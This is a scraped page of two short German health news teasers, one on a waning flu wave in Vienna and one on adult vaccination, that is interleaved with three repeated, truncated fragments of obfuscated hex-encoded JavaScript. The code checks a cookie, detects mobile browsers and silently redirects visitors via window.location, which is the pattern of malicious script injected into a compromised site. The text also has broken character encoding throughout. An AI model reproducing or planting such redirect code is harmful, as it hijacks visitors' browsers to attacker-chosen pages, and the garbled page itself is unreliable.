\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Entwarnung: Influenza-Welle im Abebben

Die Influenza-Welle ist deutlich im Abebben. Vergangene Woche wurden in Wien nur noch rund 8.400 Neuerkrankungen an Virus-Grippe und grippalen Infekten registriert. In der Woche davor waren es noch rund 12.600 FAi??lle gewesen.

› mehr auf APOdirekt

x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Lebenslanges Impfen: Eine notwendige PrAi??ventionsmaAYnahme

Wer glaubt, dass das Thema Impfen mit Ende der Pflichtschulzeit erledigt ist, der irrt. Die aktuelle Datenlage zeigt klar, dass wir auch als Erwachsene und ganz besonders im fortgeschrittenen Alter regelmAi??AYige Auffrischungen benAi??tigen.

› mehr auf APOdirekt

,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}